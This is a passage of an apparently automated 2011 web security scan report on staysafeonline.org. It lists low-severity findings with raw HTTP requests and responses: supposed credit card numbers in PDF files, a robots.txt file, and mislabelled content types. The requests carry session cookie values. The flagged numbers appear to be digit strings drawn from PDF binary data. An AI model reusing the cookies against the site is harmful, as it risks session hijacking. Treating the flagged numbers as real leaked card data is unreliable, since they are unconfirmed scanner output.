GET /sites/default/files/resource_documents/What%20Businesses%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:03 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:11:40 GMT ETag: "b7518-7d5c6-4917b7ebae546" Accept-Ranges: bytes Content-Length: 513478 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:03 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 35 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 2/Kids[ 3 0 R 27 0 R] >> endobj 3 0 obj <</...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 156 0 R>...[SNIP]...
6.2. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20College%20Admins%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20College%20Admins%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card number was disclosed in the response:
Request
GET /sites/default/files/resource_documents/What%20College%20Admins%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:03 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:11:56 GMT ETag: "b751a-7cfdb-4917b7fb50c4b" Accept-Ranges: bytes Content-Length: 511963 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:03 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 35 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 2/Kids[ 3 0 R 28 0 R] >> endobj 3 0 obj <</...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 144 0 R>...[SNIP]...
6.3. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20College%20Students%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20College%20Students%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card numbers were disclosed in the response:4932501239750 5145142300455230 5330488459002520
Request
GET /sites/default/files/resource_documents/What%20College%20Students%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/cybersecurity-awareness-month/get-involved User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.15.8.1303045041553
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:57:21 GMT Server: Apache Last-Modified: Tue, 26 Oct 2010 14:54:51 GMT ETag: "ba50b7-9c0dc-493864a7993d7" Accept-Ranges: bytes Content-Length: 639196 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 12:57:21 GMT Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 46 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 4/Kids[ 3 0 R 26 0 R 37 0 R 41 0 R] >> endobj...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 219 0 R>...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 230 0 R>...[SNIP]... .j..%\E..J.U........d9O\.P.(d+ -.....a.......O..+z......mE7....#O.. endstream endobj 216 0 obj [ 226 0 0 0 0 0 0 0 303 303 0 0 250 306 252 386 0 0 507 507 507 0 0 0 0 507 268 0 0 0 0 463 0 579 544 533 0 488 459 0 0 252 0 520 420 855 646 662 517 0 543 459 487 642 567 890 0 487 0 0 0 0 0 0 0 479 525 423 525 498 305 471 525 230 239 455 230 799 525 527 525 525 349 391 335 525 452 715 433 453 395] endobj 217 0 obj <</F...[SNIP]... 03] ] endobj 223 0 obj [ 226 0 0 0 0 0 0 0 0 0 0 0 0 306 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 544 522 615 0 459 0 0 0 0 0 0 0 645 654 0 0 0 452 0 0 0 0 0 0 0 0 0 0 0 0 0 514 514 416 514 478 305 514 514 230 0 455 230 0 514 513 514 0 343 389 335 514 0 715 0 447] endobj 224 0 obj <</Filter/FlateDecode/Length 56706/Length1 106188>...[SNIP]...
6.4. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Educators%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20Educators%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card numbers were disclosed in the response:4932501239750 4983054715252300
Request
GET /sites/default/files/resource_documents/What%20Educators%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:03 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:12:39 GMT ETag: "a6a279-75021-4917b824a43a7" Accept-Ranges: bytes Content-Length: 479265 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:03 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 36 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 2/Kids[ 3 0 R 28 0 R] >> endobj 3 0 obj <</...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 151 0 R>...[SNIP]... 0 0 0 0 0 0 0 303 303 0 0 250 306 252 386 507 507 507 0 0 0 0 0 0 0 268 0 0 0 0 0 0 579 544 533 615 488 459 0 0 252 0 520 420 855 646 662 517 0 543 459 487 642 567 0 0 0 0 0 0 0 0 0 0 479 525 423 525 498 305 471 525 230 0 455 230 799 525 527 525 525 349 391 335 525 452 715 433 453] endobj 149 0 obj <</Filter/FlateDecode/Length 68783/Length1 128980>...[SNIP]...
6.5. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Home%20Users%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20Home%20Users%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card numbers were disclosed in the response:4932501239750 4983054715252300
Request
GET /sites/default/files/resource_documents/What%20Home%20Users%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:02 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:12:57 GMT ETag: "a6a27b-7d6db-4917b83600f37" Accept-Ranges: bytes Content-Length: 513755 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:02 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 37 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 2/Kids[ 3 0 R 28 0 R] >> endobj 3 0 obj <</...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 140 0 R>...[SNIP]... 0 0 0 0 0 0 0 303 303 0 0 250 306 252 386 507 0 0 0 0 0 507 0 0 0 268 0 0 498 0 463 0 579 544 533 0 488 0 631 623 252 0 520 420 855 646 0 0 0 543 459 487 642 567 890 0 0 0 0 0 0 0 0 0 479 525 423 525 498 305 471 525 230 0 455 230 799 525 527 525 525 349 391 335 525 452 715 433 453] endobj 142 0 obj <</Filter/FlateDecode/Length 68544/Length1 128012>...[SNIP]...
6.6. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Libraries%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20Libraries%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card numbers were disclosed in the response:4715252300455230 4932501239750
Request
GET /sites/default/files/resource_documents/What%20Libraries%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:04 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:13:21 GMT ETag: "a6a27d-527bb-4917b84c82aeb" Accept-Ranges: bytes Content-Length: 337851 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:04 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 29 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 1/Kids[ 3 0 R] >> endobj 3 0 obj <</Type/Pa...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 100 0 R>...[SNIP]... 26 0 0 0 0 0 0 0 303 303 0 0 250 306 252 386 0 0 0 0 0 0 0 0 0 0 268 0 0 0 0 0 0 579 0 533 0 488 459 0 623 252 0 520 420 855 646 662 517 0 0 459 487 0 0 890 0 0 0 0 0 0 0 498 0 479 525 423 525 498 305 471 525 230 0 455 230 799 525 527 525 525 349 391 335 525 452 715 0 453] endobj 98 0 obj <</Filter/FlateDecode/Length 64385/Length1 121772>...[SNIP]...
6.7. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Local%20Government%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20Local%20Government%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card number was disclosed in the response:
Request
GET /sites/default/files/resource_documents/What%20Local%20Government%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:04 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:13:38 GMT ETag: "a6a27f-77c04-4917b85ca67a6" Accept-Ranges: bytes Content-Length: 490500 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:04 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 40 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 2/Kids[ 3 0 R 31 0 R] >> endobj 3 0 obj <</...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 174 0 R>...[SNIP]...
6.8. http://www.staysafeonline.org/sites/default/files/resource_documents/What%20Local%20Law%20Enforcement%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/resource_documents/What%20Local%20Law%20Enforcement%20Can%20Do%202010%20NCSAM%20Letterhead.pdf
Issue detail
The following credit card number was disclosed in the response:
Request
GET /sites/default/files/resource_documents/What%20Local%20Law%20Enforcement%20Can%20Do%202010%20NCSAM%20Letterhead.pdf HTTP/1.1 Host: www.staysafeonline.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: has_js=1; SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.22.8.1303045041553;
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 13:12:04 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 15:14:17 GMT ETag: "a6a281-76274-4917b881be91a" Accept-Ranges: bytes Content-Length: 483956 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 13:12:04 GMT Connection: close Content-Type: application/pdf %PDF-1.5 %.... 1 0 obj <</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 36 0 R/MarkInfo<</Marked true>>>> endobj 2 0 obj <</Type/Pages/Count 2/Kids[ 3 0 R 29 0 R] >> endobj 3 0 obj <</...[SNIP]... </Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750 ] /FontFile2 136 0 R>...[SNIP]...
7. Robots.txt file
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.staysafeonline.org
Path:
/sites/default/files/ctools/css/5f3ce74256e2f8c1805118d7e532843a.css
Issue detail
The web server contains a robots.txt file.
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
Request
GET /robots.txt HTTP/1.0 Host: www.staysafeonline.org
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:16 GMT Server: Apache Last-Modified: Thu, 30 Sep 2010 13:54:06 GMT ETag: "e8a14f-636-4917a695e0480" Accept-Ranges: bytes Content-Length: 1590 Cache-Control: max-age=1209600 Expires: Sun, 01 May 2011 12:53:16 GMT Connection: close Content-Type: text/plain # $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $ # # robots.txt # # This file is to prevent the crawling and indexing of certain parts # of your site by web crawlers and spiders run by sites...[SNIP]...
8. Content type incorrectly stated
previous
There are 4 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities. In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
8.1. http://www.staysafeonline.org/photos/get/photos/807
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.staysafeonline.org
Path:
/photos/get/photos/807
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=utf-8 The response states that it contains HTML . However, it actually appears to contain JSON .
Request
GET /photos/get/photos/807 HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; has_js=1; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.1.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:15 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 06:54:34 GMT ETag: "98c8eff7ae347fe3e4437ae2a824b523" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidateContent-Type: text/html; charset=utf-8 Content-Length: 1347 { "node": "\x3cdiv class=\"view view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 view-dom-id-1 view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 ...[SNIP]...
8.2. http://www.staysafeonline.org/photos/get/photos/809
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.staysafeonline.org
Path:
/photos/get/photos/809
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=utf-8 The response states that it contains HTML . However, it actually appears to contain JSON .
Request
GET /photos/get/photos/809 HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; has_js=1; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.1.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:18 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 06:54:37 GMT ETag: "78d4ecfe8312e08aff477783c8e90895" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidateContent-Type: text/html; charset=utf-8 Content-Length: 1487 { "node": "\x3cdiv class=\"view view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 view-dom-id-1 view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 ...[SNIP]...
8.3. http://www.staysafeonline.org/photos/get/photos/843
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.staysafeonline.org
Path:
/photos/get/photos/843
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=utf-8 The response states that it contains HTML . However, it actually appears to contain JSON .
Request
GET /photos/get/photos/843 HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; has_js=1; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.1.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:17 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 06:54:37 GMT ETag: "78d4ecfe8312e08aff477783c8e90895" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidateContent-Type: text/html; charset=utf-8 Content-Length: 1364 { "node": "\x3cdiv class=\"view view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 view-dom-id-1 view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 ...[SNIP]...
8.4. http://www.staysafeonline.org/photos/get/photos/964
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.staysafeonline.org
Path:
/photos/get/photos/964
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=utf-8 The response states that it contains HTML . However, it actually appears to contain JSON .
Request
GET /photos/get/photos/964 HTTP/1.1 Host: www.staysafeonline.org Proxy-Connection: keep-alive Referer: http://www.staysafeonline.org/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS6f57b259b59a3e27ce4de09126b9e41f=6ed2fce996f92f9a5be905086a6ec6dd; has_js=1; __utmz=238444866.1303044793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=238444866.1185729201.1303044793.1303044793.1303044793.1; __utmc=238444866; __utmb=238444866.1.10.1303044793
Response
HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 12:53:19 GMT Server: Apache Last-Modified: Sun, 17 Apr 2011 06:54:38 GMT ETag: "40fde8736f87d1a8f47108b22445aa37" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidateContent-Type: text/html; charset=utf-8 Content-Length: 1463 { "node": "\x3cdiv class=\"view view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 view-dom-id-1 view-ajax-slideshow-view view-id-ajax_slideshow_view view-display-id-block_2 ...[SNIP]...
Report generated by XSS.CX at Sun Apr 17 09:19:32 CDT 2011.